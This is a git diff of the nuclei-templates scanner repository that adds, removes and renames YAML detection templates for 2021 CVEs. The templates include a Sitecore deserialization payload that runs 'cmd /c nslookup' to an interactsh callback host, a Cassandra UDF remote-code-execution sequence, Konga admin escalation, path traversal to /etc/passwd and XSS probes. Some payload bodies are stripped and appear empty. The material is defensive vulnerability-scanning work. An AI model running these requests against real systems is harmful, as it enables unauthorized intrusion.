b/nuclei-templates/CVE-2021/CVE-2021-42237.yaml @@ -0,0 +1,116 @@ +id: CVE-2021-42237 + +info: + name: Sitecore Experience Platform Pre-Auth RCE + author: pdteam + severity: critical + description: Sitecore XP 7.5 to Sitecore XP 8.2 Update 7 is vulnerable to an insecure deserialization attack where remote commands can be executed by an attacker with no authentication or special configuration required. + reference: + - https://blog.assetnote.io/2021/11/02/sitecore-rce/ + - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776 + - https://nvd.nist.gov/vuln/detail/CVE-2021-42237 + - http://sitecore.com + remediation: For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions- - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher. - Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below. - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-42237 + cwe-id: CWE-502 + metadata: + shodan-query: http.title:"SiteCore" + tags: cve,cve2021,rce,sitecore,deserialization,oast + +requests: + - raw: + - | + POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + + foo + + + + 2 + + <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0" + xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic" + xmlns:a="http://schemas.datacontract.org/2004/07/System"> + + mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + + Compare + + + System.String + System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] + + Start + + System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + System.Diagnostics.Process + System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] + + + + + + System.Diagnostics.Process Start(System.String, System.String) + System.Diagnostics.Process Start(System.String, System.String) + 8 + + + + + + + Int32 Compare(System.String, System.String) + System.Int32 Compare(System.String, System.String) + 8 + + + + + 2 + + /c nslookup {{interactsh-url}} + cmd + + + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: word + part: body + words: + - "System.ArgumentNullException" + +# Enhanced by mp on 2022/02/08 diff --git a/nuclei-templates/CVE-2021/cve-2021-42258.yaml b/nuclei-templates/CVE-2021/CVE-2021-42258.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-42258.yaml rename to nuclei-templates/CVE-2021/CVE-2021-42258.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-42565.yaml b/nuclei-templates/CVE-2021/CVE-2021-42565.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-42565.yaml rename to nuclei-templates/CVE-2021/CVE-2021-42565.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-42566.yaml b/nuclei-templates/CVE-2021/CVE-2021-42566.yaml new file mode 100644 index 0000000000..2ba8f6ef60 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-42566.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-42566 + +info: + name: myfactory FMS - Reflected Cross-Site Scripting + author: madrobot + severity: medium + description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42566 + - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566 + - https://www.redteam-pentesting.de/advisories/rt-sa-2021-001 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-42566 + cwe-id: CWE-79 + tags: cve,cve2021,myfactory,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "" + condition: and + + - type: word + part: header + words: + - "text/html" + +# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-43062.yaml b/nuclei-templates/CVE-2021/CVE-2021-43062.yaml deleted file mode 100644 index 9528b0ce66..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-43062.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2021-43062 - -info: - name: Fortinet FortiMail 7.0.1 - Cross-Site Scripting - author: ajaysenr - severity: medium - description: A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest security patch or upgrade to a non-vulnerable version of Fortinet FortiMail. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-43062 - - https://www.fortiguard.com/psirt/FG-IR-21-185 - - https://www.exploit-db.com/exploits/50759 - - https://fortiguard.com/advisory/FG-IR-21-185 - - https://github.com/ARPSyndicate/cvemon - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-43062 - cwe-id: CWE-79 - epss-score: 0.00709 - epss-percentile: 0.79992 - cpe: cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: fortinet - product: fortimail - tags: cve,cve2021,fortimail,xss,fortinet,edb - -http: - - method: GET - path: - - "{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "FortiMail Click Protection" - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# digest: 490a00463044022035f3b272f2f2eb3ffd2265b03fc34944ba5ea2298fe4943fccb382b77dcbfb5402206fae9c44d872dbd06fb5992248d7d731d43168f9ce8c47f3ede8c51ca7b34c5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-43495.yaml b/nuclei-templates/CVE-2021/CVE-2021-43495.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-43495.yaml rename to nuclei-templates/CVE-2021/CVE-2021-43495.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-43778.yaml b/nuclei-templates/CVE-2021/CVE-2021-43778.yaml new file mode 100644 index 0000000000..ca45e3115f --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-43778.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-43778 + +info: + name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability. + author: cckuailong + severity: high + description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. + reference: + - https://github.com/AK-blank/CVE-2021-43778 + - https://nvd.nist.gov/vuln/detail/CVE-2021-43778 + - https://github.com/pluginsGLPI/barcode/security/advisories/GHSA-2pjh-h828-wcw9 + - https://github.com/pluginsGLPI/barcode/releases/tag/2.6.1 + remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-43778 + cwe-id: CWE-22 + cpe: cpe:2.3:a:glpi-project:barcode:*:*:*:*:*:*:*:* + epss-score: 0.77314 + tags: glpi,cve,cve2021,lfi,plugin,traversal + metadata: + max-request: 1 + +http: + - method: GET + path: + - "{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-44103.yaml b/nuclei-templates/CVE-2021/CVE-2021-44103.yaml new file mode 100644 index 0000000000..915e1a03cc --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-44103.yaml @@ -0,0 +1,69 @@ +id: CVE-2021-44103 +info: + name: KOGA 0.14.9 - Privilege Escalation + author: rschio + severity: high + description: Vertical Privilege Escalation in KONGA 0.14.9 allows attackers to higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter. + reference: + - http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html + - https://www.exploit-db.com/exploits/50521 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44103 + classification: + cvss-score: 8.7 + cve-id: CVE-2021-44103 + cwe-id: CWE-264 + tags: cve,cve2021,konga,authenticated +requests: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"password": "{{password}}", "identifier": "{{username}}"} + - | + POST /api/user/{{id}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Content-Type: application/json;charset=utf-8 + + {"token": "{{token}}"} + - | + PUT /api/user/{{id}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Content-Type: application/json;charset=utf-8 + + {"admin": "true", "passports": {"password": "{{password}}", "protocol": "local"}, "token": "{{token}}", "password_confirmation": "{{password}}"} + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_2, "\"admin\":false")' + - 'contains(body_3, "\"admin\":true")' + condition: and + - type: word + part: header + words: + - "application/json" + - type: status + status: + - 200 + extractors: + - type: regex + part: body + name: id + internal: true + group: 1 + regex: + - '"id":([0-9]+)' + - type: regex + part: body + name: token + internal: true + group: 1 + regex: + - '"token":"(.*)"' diff --git a/nuclei-templates/CVE-2021/cve-2021-44427.yaml b/nuclei-templates/CVE-2021/CVE-2021-44427.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-44427.yaml rename to nuclei-templates/CVE-2021/CVE-2021-44427.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-44515.yaml b/nuclei-templates/CVE-2021/CVE-2021-44515.yaml deleted file mode 100644 index 73c1dee88e..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-44515.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-44515 -info: - name: Zoho ManageEngine Desktop Central - Remote Code Execution - author: Adam Crosser - severity: critical - description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server. - reference: - - https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog - - https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html - - https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis - - https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp - - https://nvd.nist.gov/vuln/detail/CVE-2021-44515 - remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-44515 - cwe-id: CWE-287 - tags: cve,cve2021,zoho,rce,manageengine,kev -requests: - - raw: - - | - GET /STATE_ID/123/agentLogUploader HTTP/1.1 - Host: {{Hostname}} - Cookie: STATE_COOKIE=&_REQS/_TIME/123 - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: dsl - dsl: - - "len(body) == 0" - - type: word - part: header - words: - - "UEMJSESSIONID=" - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/CVE-2021-44521.yaml b/nuclei-templates/CVE-2021/CVE-2021-44521.yaml deleted file mode 100644 index dfedb77d30..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-44521.yaml +++ /dev/null @@ -1,76 +0,0 @@ -id: CVE-2021-44521 - -info: - name: Apache Cassandra Load UDF RCE - author: Y4er - severity: critical - description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.' - impact: | - Successful exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the Cassandra process, potentially leading to a complete compromise of the affected system. - remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2 - reference: - - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-44521 - - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/ - - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356 - - http://www.openwall.com/lists/oss-security/2022/02/11/4 - - https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.1 - cve-id: CVE-2021-44521 - cwe-id: CWE-732,CWE-94 - epss-score: 0.04594 - epss-percentile: 0.92315 - cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: apache - product: cassandra - tags: cve,cve2021,network,rce,apache,cassandra -tcp: - - host: - - "{{Hostname}}" - - "{{Host}}:9042" - inputs: - - data: "050000000500000000" - type: hex - read: 1024 - - - data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35" - type: hex - read: 1024 - - - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a" - type: hex - read: 1024 - - - data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b" - type: hex - read: 1024 - - - data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510" - type: hex - read: 1024 - - - data: "1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85" - type: hex - read: 1024 - - - data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e" - type: hex - read: 1024 - - - data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281" - type: hex - read: 1024 - - - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a" - type: hex - read: 1024 - matchers: - - type: word - part: raw - words: - - "123123" -# digest: 4b0a00483046022100b2f33e9771382f46589a612f1ad1b13cbaa977983861b561b5c2557114ed8f1c022100c96cecc141a01aa8881c20b8b687c5702c88c1868cb5614f1c3cadfbee39bf61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-44528.yaml b/nuclei-templates/CVE-2021/CVE-2021-44528.yaml new file mode 100644 index 0000000000..52aea3dc60 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-44528.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-44528 +info: + name: Open Redirect in Host Authorization Middleware + author: geeknik + severity: medium + description: Specially crafted "X-Forwarded-Host" headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. + reference: + - https://seclists.org/oss-sec/2021/q4/att-160/7-0-host-authorzation-open-redirect.patch + - https://nvd.nist.gov/vuln/detail/CVE-2021-44528 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-44528 + cwe-id: CWE-601 + tags: cve,cve2021,redirect +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + X-Forwarded-Host: //example.com + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' + - type: status + status: + - 301 + - 302 + - 307 + - 308 + +# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-44529.yaml b/nuclei-templates/CVE-2021/CVE-2021-44529.yaml new file mode 100644 index 0000000000..2da889cad6 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-44529.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-44529 + +info: + name: Ivanti EPM Cloud Services Appliance Code Injection + author: duty_1g,phyr3wall,Tirtha + severity: critical + description: Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody). + remediation: | + Apply the latest security patches provided by Ivanti to mitigate this vulnerability. + reference: + - https://forums.ivanti.com/s/article/SA-2021-12-02 + - https://twitter.com/Dinosn/status/1505273954478530569 + - https://nvd.nist.gov/vuln/detail/CVE-2021-44529 + - http://packetstormsecurity.com/files/166383/Ivanti-Endpoint-Manager-CSA-4.5-4.6-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-44529 + cwe-id: CWE-94 + epss-score: 0.95982 + epss-percentile: 0.99313 + cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: ivanti + product: endpoint_manager_cloud_services_appliance + shodan-query: title:"LANDesk(R) Cloud Services Appliance" + tags: cve2021,ivanti,epm,csa,injection,packetstorm,cve + +http: + - raw: + - | + GET /client/index.php HTTP/1.1 + Host: {{Hostname}} + Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=; + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "phpinfo()" + - "Cloud Services Appliance" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a004730450220556de63bbb262cc8ad65b9944c9a2937ab5306e4e7b0559d05e05f671dae2fdf022100add47a88e1d37c64bed2411a5242b4ba229edf677de18dfec9af3d1315f41fe2:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2021/CVE-2021-44848.yaml b/nuclei-templates/CVE-2021/CVE-2021-44848.yaml deleted file mode 100644 index 13455b09d6..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-44848.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2021-44848 - -info: - name: User Enumeration - author: danielmofer - severity: medium - description: Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.) - reference: - - https://github.com/cybelesoft/virtualui/issues/1 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44848 - - https://www.tenable.com/cve/CVE-2021-44848 - tags: cve,cve2021,exposure - -requests: - - raw: - - | - GET /changePassword?username=administrator HTTP/1.1 - Host: {{Hostname}} - - | - GET /changePassword?username=admin HTTP/1.1 - Host: {{Hostname}} - - | - GET /changePassword?username=guest HTTP/1.1 - Host: {{Hostname}} - - stop-at-first-match: true - matchers: - - type: regex - regex: - - "rc.*" - part: body diff --git a/nuclei-templates/CVE-2021/CVE-2021-45232.yaml b/nuclei-templates/CVE-2021/CVE-2021-45232.yaml new file mode 100644 index 0000000000..b9ba133938 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-45232.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-45232 + +info: + name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access + author: Mr-xn + severity: critical + description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication. + reference: + - https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/ + - https://github.com/pingpongcult/CVE-2021-45232 + - https://github.com/advisories/GHSA-wcxq-f256-53xp + - https://twitter.com/403Timeout/status/1475715079173976066 + - https://github.com/wuppp/cve-2021-45232-exp + remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-45232 + cwe-id: CWE-306 + tags: cve,cve2021,apache,unauth,apisix + +requests: + - method: GET + path: + - "{{RootURL}}/apisix/admin/migrate/export" + + matchers-condition: and + matchers: + + - type: word + words: + - '"Consumers":' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2021/CVE-2021-45380.yaml b/nuclei-templates/CVE-2021/CVE-2021-45380.yaml new file mode 100644 index 0000000000..f477a7e9ba --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-45380.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-45380 + +info: + name: AppCMS - Cross-Site Scripting + author: pikpikcu + severity: medium + description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. + reference: + - https://github.com/source-trace/appcms/issues/8 + - https://nvd.nist.gov/vuln/detail/CVE-2021-45380 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-45380 + cwe-id: CWE-79 + epss-score: 0.00314 + epss-percentile: 0.66939 + cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: appcms + product: appcms + shodan-query: http.html:"Powerd by AppCMS" + tags: cve,cve2021,appcms,xss + +http: + - method: GET + path: + - '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"">' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100d9a1bdcec8acbc69b9f6b66ffed0ea1514dd6bb8723374b23b987f2f6c525cdf0220386c015f762c8a2f5dad96d9db5ddd17ffb96c8f229a7f75b669e4e75edb6736:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2021/CVE-2021-46005.yaml b/nuclei-templates/CVE-2021/CVE-2021-46005.yaml new file mode 100644 index 0000000000..a12d8d5b11 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-46005.yaml @@ -0,0 +1,122 @@ +id: CVE-2021-46005 + +info: + name: Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting + author: cckuailong + severity: medium + description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. + reference: + - https://www.exploit-db.com/exploits/49546 + - https://nvd.nist.gov/vuln/detail/CVE-2021-46005 + - https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2021-46005 + cwe-id: CWE-79 + epss-score: 0.00143 + epss-percentile: 0.50027 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: car_rental_management_system_project + product: car_rental_management_system + tags: sourcecodester,authenticated,edb,cve,cve2021,xss,intrusive + +http: + - raw: + - | + POST /admin/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Connection: close + + username={{username}}&password={{password}}&login= + - | + POST /admin/post-avehical.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv + + ------WebKitFormBoundarypWqYipqU21aYgccv + Content-Disposition: form-data; name="vehicletitle" + + Test + ------WebKitFormBoundarypWqYipqU21aYgccv + Content-Disposition: form-data; name="brandname" + + 1 + ------WebKitFormBoundarypWqYipqU21aYgccv + Content-Disposition: form-data; name="vehicalorcview" + + + ------WebKitFormBoundarypWqYipqU21aYgccv + Content-Disposition: form-data; name="priceperday" + + 500 + ------WebKitFormBoundarypWqYipqU21aYgccv + Content-Disposition: form-data; name="fueltype" + + Petrol + ------WebKitFormBoundarypWqYipqU21aYgccv + Content-Disposition: form-data; name="modelyear" + + 2022 + ------WebKitFormBoundarypWqYipqU21aYgccv + Content-Disposition: form-data; name="seatingcapacity" + + 5 + ------WebKitFormBoundarypWqYipqU21aYgccv + Content-Disposition: form-data; name="img1"; filename="test.png" + Content-Type: image/png + + + ------WebKitFormBoundarypWqYipqU21aYgccv + Content-Disposition: form-data; name="img2"; filename="test.png" + Content-Type: image/png + + + ------WebKitFormBoundarypWqYipqU21aYgccv + Content-Disposition: form-data; name="img3"; filename="test.png" + Content-Type: image/png + + + ------WebKitFormBoundarypWqYipqU21aYgccv + Content-Disposition: form-data; name="img4"; filename="test.png" + Content-Type: image/png + + + ------WebKitFormBoundarypWqYipqU21aYgccv + Content-Disposition: form-data; name="img5"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundarypWqYipqU21aYgccv + Content-Disposition: form-data; name="submit" + + + ------WebKitFormBoundarypWqYipqU21aYgccv-- + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# digest: 4b0a0048304602210095f27122bb964b96f565ad9570a1db293f5f748c7110c9e87d973f409bb97ef3022100f4434e94a7d147c022660c030023e2eb3dc3ccf02a49a743f5e7ecaa22a12667:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2021/cve-2021-46379.yaml 